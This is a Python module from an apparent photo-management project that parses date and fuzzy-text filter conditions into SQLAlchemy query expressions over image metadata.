2022-01-13T00:43:22.000Z
|
photomanager/lib/filter.py
|
wrenchzc/photomanager
|
1111587762b6e71b9ffff06241cdcd537b8c96e9
|
[
"MIT"
] | null | null | null |
import re
import typing
from sqlalchemy.sql.elements import BinaryExpression
from sqlalchemy import func, or_, and_
from photomanager.lib.errors import FilterError, FilterInvalidError
from photomanager.db.models import ImageMeta
FILTER_FIELD_DATE = "date"
class FilterParser(object):
def __init__(self, condition: str):
self.condition = condition
def parse(self) -> BinaryExpression:
        pattern = r'(.*?)\.(.*?):(.*)'
matched = re.match(pattern, self.condition)
if not matched:
return self.do_parse_fuzzy_search(self.condition)
field, operator, val = matched.groups()
if field == FILTER_FIELD_DATE:
val = self.standard_date_str(val)
return self.do_parse_time_field(operator, val)
def do_parse_fuzzy_search(self, val):
like_cond = f"%{val}%"
return or_(ImageMeta.filename.like(like_cond),
ImageMeta.folder.like(like_cond),
ImageMeta.city.like(like_cond),
ImageMeta.address.like(like_cond)
)
def do_parse_time_field(self, operator: str, val: str) -> BinaryExpression:
# date is a sqlite function
# must use Model.field == None, not Model.field is None, because the operator "==" override by sqlalchemy
if operator == "eq":
return or_(func.date(ImageMeta.origin_datetime) == val,
and_(func.date(ImageMeta.file_createtime) == val,
ImageMeta.origin_datetime == None))
elif operator == "gt":
return or_(func.date(ImageMeta.origin_datetime) > val,
and_(func.date(ImageMeta.file_createtime) > val,
ImageMeta.origin_datetime == None))
elif operator == "gte":
return or_(func.date(ImageMeta.origin_datetime) >= val,
and_(func.date(ImageMeta.file_createtime) >= val,
ImageMeta.origin_datetime == None))
elif operator == "lt":
return or_(func.date(ImageMeta.origin_datetime) < val,
and_(func.date(ImageMeta.file_createtime) < val,
ImageMeta.origin_datetime == None))
elif operator == "lte":
return or_(func.date(ImageMeta.origin_datetime) <= val,
and_(func.date(ImageMeta.file_createtime) <= val,
ImageMeta.origin_datetime == None))
def standard_date_str(self, val: str):
if len(val) < 8 or len(val) > 10:
raise FilterInvalidError
return_val = val
if len(val) == 8: # such as 20201005
return_val = val[0:4] + "-" + val[4:6] + '-' + val[6:]
return return_val
class FiltersParser(object):
def __init__(self, conditions: typing.List[str]):
self.conditions = conditions
def parse(self):
expr = None
for cond in self.conditions:
cur_expr = FilterParser(cond).parse()
if expr is not None:
expr = and_(expr, cur_expr)
else:
expr = cur_expr
return expr
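# --- Hedged usage sketch (not part of the original module) ---
# Condition strings follow the "<field>.<operator>:<value>" pattern parsed
# above; anything that does not match falls back to the fuzzy LIKE search over
# filename/folder/city/address. The condition values below are hypothetical.
#
#   expr = FiltersParser(["date.gte:20201005", "beach"]).parse()
#   # expr is a SQLAlchemy expression that can be passed to Query.filter()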
| 37.376471
| 113
| 0.582625
|